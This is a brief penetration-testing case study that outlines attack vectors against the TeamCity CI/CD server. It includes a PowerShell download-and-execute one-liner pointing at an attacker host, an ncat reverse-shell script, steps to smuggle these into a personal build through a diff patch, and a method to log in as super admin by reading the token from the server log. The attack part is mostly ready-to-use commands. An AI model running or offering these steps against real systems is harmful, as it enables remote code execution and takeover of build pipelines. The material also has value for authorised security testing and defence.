Case Study - Teamcity Pentest
intro
TeamCity is a popular continuous integration and delivery (CI/CD) tool developed by JetBrains, which helps to automate the build, test, and deployment processes of software applications. It supports a variety of programming languages and build tools, including Java, .NET, Ruby, and Python. TeamCity provides a comprehensive set of features such as automatic build triggering, version control integration, code coverage analysis, test reporting, and extensive customization options. It also offers a user-friendly web-based interface, which allows developers and managers to easily monitor the status of builds, investigate failures, and manage project configurations. In addition, TeamCity integrates with other JetBrains tools, such as IntelliJ IDEA, ReSharper, and RubyMine, to provide a seamless development and testing experience. It also offers extensive plugin support, allowing users to extend its functionality and integrate it with other tools and services. This case study summarizes some attack vectors regarding TeamCity.
RCE via personal build
A personal build is a build-out of the common build sequence which typically uses the changes not yet committed into the version control. A personal build uses the current VCS repository sources plus the changed files identified during the remote run initiation. This means, when you run a build as a personal build, you are able to submit a patch to it. This creates a risk of RCE because it is possible to create a patch (i.e a diff file) with malicious content.
Let’s take a powershell script as an example and make it load a malicous script composed by us.
IEX (New-Object Net.WebClient).DownloadString('http://<attacker>/shell.ps1')
The shell.ps1 script can contain something like below
Invoke-Expression 'cmd /c start <path-to>\ncat.exe <attacker> 4444 -e cmd.exe'
Start-Sleep -Seconds 3600
Then create the patch
> git diff --oneline --graph <commit-hash> > patch.diff
Now, we can upload this diff to TeamCity and create a personal build to execute the malicious powershell script.
Therefore, during local enumeration on a system, it is also recommended to search for .diff files.
# windows
> dir /s *.diff
# linux
> find / -type f -name *.diff 2>/dev/null
Login as superadmin
There are many cases where you need access to TeamCity as admin but don’t have the password for it. It is possible to use a “feature” provided by TeamCity to login as an admin: https://www.jetbrains.com/teamcity/answers/reset-teamcity-admin-password/.
Basically, you can sign in to TeamCity as Super User by providing a special authentication token. TeamCity sends such tokens to the server log file located in <TeamCity installation directory>\logs\teamcity-server.log. Search for the most recent token value. Copy the token and return to the TeamCity login form. Leave the username empty and paste the Super User token as the password. Then you are able to operate as a super admin.